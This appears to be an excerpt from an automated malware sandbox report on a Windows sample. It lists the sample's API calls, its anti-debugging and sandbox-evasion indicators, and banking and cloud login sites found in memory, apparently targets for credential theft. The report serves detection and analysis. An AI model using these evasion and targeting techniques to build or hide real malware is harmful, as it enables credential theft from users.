Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C75376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 5_2_00C75376
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_000F48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 7_2_000F48D7
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_00175376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 7_2_00175376
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C13187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_00C13187
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mobsync.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe API/Special instruction interceptor: Address: 2EA3294
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe API/Special instruction interceptor: Address: 1883294
Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\mobsync.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0337096E rdtsc 9_2_0337096E
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_000F96E0 sldt word ptr [esp+esi*8] 7_2_000F96E0
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\mobsync.exe Window / User API: threadDelayed 9787
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\25Lz840Dmh.exe API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe API coverage: 5.1 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
Source: C:\Windows\SysWOW64\mobsync.exe TID: 2260 Thread sleep count: 183 > 30
Source: C:\Windows\SysWOW64\mobsync.exe TID: 2260 Thread sleep time: -366000s >= -30000s
Source: C:\Windows\SysWOW64\mobsync.exe TID: 2260 Thread sleep count: 9787 > 30
Source: C:\Windows\SysWOW64\mobsync.exe TID: 2260 Thread sleep time: -19574000s >= -30000s
Source: C:\Windows\SysWOW64\mobsync.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C5445A GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00C5445A
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C5C6D1 FindFirstFileW,FindClose, 5_2_00C5C6D1
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C5C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00C5C75C
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C5EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00C5EF95
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C5F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00C5F0F2
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C5F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_00C5F3F3
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00C537EF
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C53B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00C53B12
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C5BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_00C5BCBC
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_0015445A GetFileAttributesW,FindFirstFileW,FindClose, 7_2_0015445A
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_0015C6D1 FindFirstFileW,FindClose, 7_2_0015C6D1
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_0015C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 7_2_0015C75C
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_0015EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_0015EF95
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_0015F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_0015F0F2
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_0015F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 7_2_0015F3F3
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_001537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_001537EF
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_00153B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_00153B12
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_0015BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 7_2_0015BCBC
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BF49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00BF49A0
Source: w2-0G0-7.15.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: w2-0G0-7.15.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: w2-0G0-7.15.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: w2-0G0-7.15.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: w2-0G0-7.15.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: w2-0G0-7.15.dr Binary or memory string: outlook.office.comVMware20,11696492231s
Source: w2-0G0-7.15.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: w2-0G0-7.15.dr Binary or memory string: AMC password management pageVMware20,11696492231
Source: w2-0G0-7.15.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: w2-0G0-7.15.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: mobsync.exe, 0000000F.00000002.2540011755.0000000003118000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/%
Source: w2-0G0-7.15.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: w2-0G0-7.15.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: w2-0G0-7.15.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: w2-0G0-7.15.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: LHSqcaLVnKQk.exe, 00000012.00000002.2542163733.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: w2-0G0-7.15.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: w2-0G0-7.15.dr Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 00000014.00000002.2199578147.0000012F04EFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: w2-0G0-7.15.dr Binary or memory string: global block list test formVMware20,11696492231
Source: w2-0G0-7.15.dr Binary or memory string: dev.azure.comVMware20,11696492231j
Source: w2-0G0-7.15.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: w2-0G0-7.15.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: w2-0G0-7.15.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: w2-0G0-7.15.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: w2-0G0-7.15.dr Binary or memory string: tasks.office.comVMware20,11696492231o
Source: w2-0G0-7.15.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: w2-0G0-7.15.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: w2-0G0-7.15.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: w2-0G0-7.15.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: w2-0G0-7.15.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: w2-0G0-7.15.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: w2-0G0-7.15.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: w2-0G0-7.15.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\25Lz840Dmh.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\mobsync.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0337096E rdtsc 9_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00417713 LdrLoadDll, 9_2_00417713
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C63F09 BlockInput, 5_2_00C63F09
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BF3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00BF3B3A
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00C25A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 5_2_00C25A7C
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_00BF4B37 LoadLibraryA,GetProcAddress, 5_2_00BF4B37
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_02283500 mov eax, dword ptr fs:[00000030h] 5_2_02283500
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_02283560 mov eax, dword ptr fs:[00000030h] 5_2_02283560
Source: C:\Users\user\Desktop\25Lz840Dmh.exe Code function: 5_2_02281EA0 mov eax, dword ptr fs:[00000030h] 5_2_02281EA0
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_02EA3560 mov eax, dword ptr fs:[00000030h] 7_2_02EA3560
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_02EA3500 mov eax, dword ptr fs:[00000030h] 7_2_02EA3500
Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe Code function: 7_2_02EA1EA0 mov eax, dword ptr fs:[00000030h] 7_2_02EA1EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0340634F mov eax, dword ptr fs:[00000030h] 9_2_0340634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0332C310 mov ecx, dword ptr fs:[00000030h] 9_2_0332C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03350310 mov ecx, dword ptr fs:[00000030h] 9_2_03350310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0336A30B mov eax, dword ptr fs:[00000030h] 9_2_0336A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033D437C mov eax, dword ptr fs:[00000030h] 9_2_033D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03408324 mov eax, dword ptr fs:[00000030h] 9_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03408324 mov ecx, dword ptr fs:[00000030h] 9_2_03408324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033B035C mov eax, dword ptr fs:[00000030h] 9_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033B035C mov ecx, dword ptr fs:[00000030h] 9_2_033B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033FA352 mov eax, dword ptr fs:[00000030h] 9_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033D8350 mov ecx, dword ptr fs:[00000030h] 9_2_033D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033B2349 mov eax, dword ptr fs:[00000030h] 9_2_033B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03328397 mov eax, dword ptr fs:[00000030h] 9_2_03328397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0332E388 mov eax, dword ptr fs:[00000030h] 9_2_0332E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0335438F mov eax, dword ptr fs:[00000030h] 9_2_0335438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0334E3F0 mov eax, dword ptr fs:[00000030h] 9_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033663FF mov eax, dword ptr fs:[00000030h] 9_2_033663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033403E9 mov eax, dword ptr fs:[00000030h] 9_2_033403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033DE3DB mov eax, dword ptr fs:[00000030h] 9_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033DE3DB mov ecx, dword ptr fs:[00000030h] 9_2_033DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033D43D4 mov eax, dword ptr fs:[00000030h] 9_2_033D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_033EC3CD mov eax, dword ptr fs:[00000030h] 9_2_033EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0333A3C0 mov eax, dword ptr fs:[00000030h] 9_2_0333A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A3C0 mov eax, dword ptr fs:[00000030h]9_2_0333A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A3C0 mov eax, dword ptr fs:[00000030h]9_2_0333A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033383C0 mov eax, dword ptr fs:[00000030h]9_2_033383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033383C0 mov eax, dword ptr fs:[00000030h]9_2_033383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033383C0 mov eax, dword ptr fs:[00000030h]9_2_033383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033383C0 mov eax, dword ptr fs:[00000030h]9_2_033383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B63C0 mov eax, dword ptr fs:[00000030h]9_2_033B63C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332823B mov eax, dword ptr fs:[00000030h]9_2_0332823B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0340625D mov eax, dword ptr fs:[00000030h]9_2_0340625D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0274 mov eax, dword ptr fs:[00000030h]9_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03334260 mov eax, dword ptr fs:[00000030h]9_2_03334260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03334260 mov eax, dword ptr fs:[00000030h]9_2_03334260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03334260 mov eax, dword ptr fs:[00000030h]9_2_03334260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332826B mov eax, dword ptr fs:[00000030h]9_2_0332826B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A250 mov eax, dword ptr fs:[00000030h]9_2_0332A250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336259 mov eax, dword ptr fs:[00000030h]9_2_03336259
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EA250 mov eax, dword ptr fs:[00000030h]9_2_033EA250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EA250 mov eax, dword ptr fs:[00000030h]9_2_033EA250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B8243 mov eax, dword ptr fs:[00000030h]9_2_033B8243
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B8243 mov ecx, dword ptr fs:[00000030h]9_2_033B8243
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033402A0 mov eax, dword ptr fs:[00000030h]9_2_033402A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033402A0 mov eax, dword ptr fs:[00000030h]9_2_033402A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_034062D6 mov eax, dword ptr fs:[00000030h]9_2_034062D6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov eax, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov ecx, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov eax, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov eax, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov eax, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C62A0 mov eax, dword ptr fs:[00000030h]9_2_033C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E284 mov eax, dword ptr fs:[00000030h]9_2_0336E284
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E284 mov eax, dword ptr fs:[00000030h]9_2_0336E284
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B0283 mov eax, dword ptr fs:[00000030h]9_2_033B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B0283 mov eax, dword ptr fs:[00000030h]9_2_033B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B0283 mov eax, dword ptr fs:[00000030h]9_2_033B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033402E1 mov eax, dword ptr fs:[00000030h]9_2_033402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033402E1 mov eax, dword ptr fs:[00000030h]9_2_033402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033402E1 mov eax, dword ptr fs:[00000030h]9_2_033402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A2C3 mov eax, dword ptr fs:[00000030h]9_2_0333A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A2C3 mov eax, dword ptr fs:[00000030h]9_2_0333A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A2C3 mov eax, dword ptr fs:[00000030h]9_2_0333A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A2C3 mov eax, dword ptr fs:[00000030h]9_2_0333A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333A2C3 mov eax, dword ptr fs:[00000030h]9_2_0333A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03360124 mov eax, dword ptr fs:[00000030h]9_2_03360124
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404164 mov eax, dword ptr fs:[00000030h]9_2_03404164
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03404164 mov eax, dword ptr fs:[00000030h]9_2_03404164
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DA118 mov ecx, dword ptr fs:[00000030h]9_2_033DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DA118 mov eax, dword ptr fs:[00000030h]9_2_033DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DA118 mov eax, dword ptr fs:[00000030h]9_2_033DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DA118 mov eax, dword ptr fs:[00000030h]9_2_033DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F0115 mov eax, dword ptr fs:[00000030h]9_2_033F0115
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov ecx, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov ecx, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov ecx, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov eax, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DE10E mov ecx, dword ptr fs:[00000030h]9_2_033DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332C156 mov eax, dword ptr fs:[00000030h]9_2_0332C156
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C8158 mov eax, dword ptr fs:[00000030h]9_2_033C8158
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336154 mov eax, dword ptr fs:[00000030h]9_2_03336154
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03336154 mov eax, dword ptr fs:[00000030h]9_2_03336154
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C4144 mov eax, dword ptr fs:[00000030h]9_2_033C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C4144 mov eax, dword ptr fs:[00000030h]9_2_033C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C4144 mov ecx, dword ptr fs:[00000030h]9_2_033C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C4144 mov eax, dword ptr fs:[00000030h]9_2_033C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C4144 mov eax, dword ptr fs:[00000030h]9_2_033C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B019F mov eax, dword ptr fs:[00000030h]9_2_033B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B019F mov eax, dword ptr fs:[00000030h]9_2_033B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B019F mov eax, dword ptr fs:[00000030h]9_2_033B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B019F mov eax, dword ptr fs:[00000030h]9_2_033B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A197 mov eax, dword ptr fs:[00000030h]9_2_0332A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A197 mov eax, dword ptr fs:[00000030h]9_2_0332A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332A197 mov eax, dword ptr fs:[00000030h]9_2_0332A197
